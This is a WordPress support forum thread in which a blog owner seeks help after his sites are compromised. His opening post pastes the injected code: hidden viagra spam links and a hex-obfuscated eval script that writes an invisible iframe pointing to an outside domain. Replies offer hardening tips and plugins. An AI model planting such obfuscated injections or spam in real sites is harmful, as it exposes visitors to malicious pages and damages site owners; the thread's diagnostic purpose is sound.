Title: WordPress Exploit: script inserted into code
Last modified: August 19, 2016

---

# WordPress Exploit: script inserted into code

 *  [andiz](https://wordpress.org/support/users/andiz/)
 * (@andiz)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/)
 * Lately some of my WordPress blogs have been targeted by some hacker. Everytime
   I check out the source of my blogs I see these kind of links:
 *     ```
       </body></html><font style='position: absolute;overflow: hidden;height: 0;width: 0'>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra.htm"; title="buy viagra">buy viagra</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online.htm"; title="buy viagra online">buy viagra online</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online-viagra.htm"; title="buy viagra online viagra">buy viagra online viagra</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=viagra-buy.htm"; title="viagra buy">viagra buy</a>
       ```
   
 * It has nothing to do with my theme, I’m using my own theme and I am 100% sure
   that the theme is not the source of the problem.
 * I have been monitoring my weblogs to see what the cause of the problem is. Here
   is a list of what I tried to stop it:
 * – Upgrade to the latest WP (Yet it kept coming back)
    – Secure WP admin with 
   htaccess (No effect) – Change FTP password – Check permissions of files and folders–
   Check plugins
 * Another thing that I noticed is the following. Almost all of my themes also had
   the following code inserted at the end of the source code:
 *     ```
       <Script>
       <!--
       var d=document;
       eval( unescape( "%69%66%20%28%21%6d%79%69%61%29%20%7b%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%28%65%6c%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%29%2e%6c%65%6e%67%74%68%29%7b%69%66%28%20%28%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%5b%69%5d%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%5b%69%5d%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%5b%69%5d%2e%6e%61%6d%65%21%3d%63%31%20%29%20%7b%65%6c%5b%69%5d%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%5b%69%5d%29%3b%7d%69%20%2b%2b%3b%7d%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%34%35%37%30%29%2b%27%33%66%61%66%61%30%30%64%36%62%5c%27%20%77%69%64%74%68%3d%31%30%37%20%68%65%69%67%68%74%3d%35%31%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%0d%0a%09%09%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c1439772935;
       //-->
       </Script>
       ```
   
 * What I noticed is that the only solution was to rewrite the old WordPress files
   with the ones that I downloaded. I finally found where the code was being inserted:
   index.php in the root folder of the weblog.
 * I would like to know the following things:
 * – Is this because of my setup or is this some new WP exploit?
    – What can I do
   to stop these kind of exploits in the future?
 * Thanks!

Viewing 6 replies - 16 through 21 (of 21 total)

[←](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/?output_format=md)
[1](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/?output_format=md)
2

 *  [macsoft3](https://wordpress.org/support/users/macsoft3/)
 * (@macsoft3)
 * [17 years, 12 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718256)
 * I would create a new administrative username for WP deleting all others. If they
   know your administrative username, they can just run a program to guess the password
   just like guessing a PIN number.
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718258)
 * Attack repeated. I’ve already changed password and did all the stuff, but they
   somehow managed to change index files to files pointing to their site pizdec 
   dot ru. It is other guys using the same software – previous attack used to promote
   another site.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718259)
 * segal, I **really** recommend using my [post-logger](http://www.village-idiot.org/post-logger)
   plugin.
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718260)
 * > segal, I really recommend using my post-logger plugin.
 * Thanks, installed.
 *  [Sonika](https://wordpress.org/support/users/sonika/)
 * (@sonika)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718269)
 * Plugin “anti xss attak” maybe help you?
    for wp 2.5: [http://mywordpress.ru/plugins/anti-xss-attack/2/](http://mywordpress.ru/plugins/anti-xss-attack/2/)
   for wp 2.3.3: [http://maxsite.org/anti-xss-attack-update](http://maxsite.org/anti-xss-attack-update)
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718270)
 * Spasibo!

Viewing 6 replies - 16 through 21 (of 21 total)

[←](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/?output_format=md)
[1](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/?output_format=md)
2

The topic ‘WordPress Exploit: script inserted into code’ is closed to new replies.

 * In: [Developing with WordPress](https://wordpress.org/support/forum/wp-advanced/)
 * 21 replies
 * 12 participants
 * Last reply from: [segal](https://wordpress.org/support/users/segal/)
 * Last activity: [17 years, 11 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718270)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics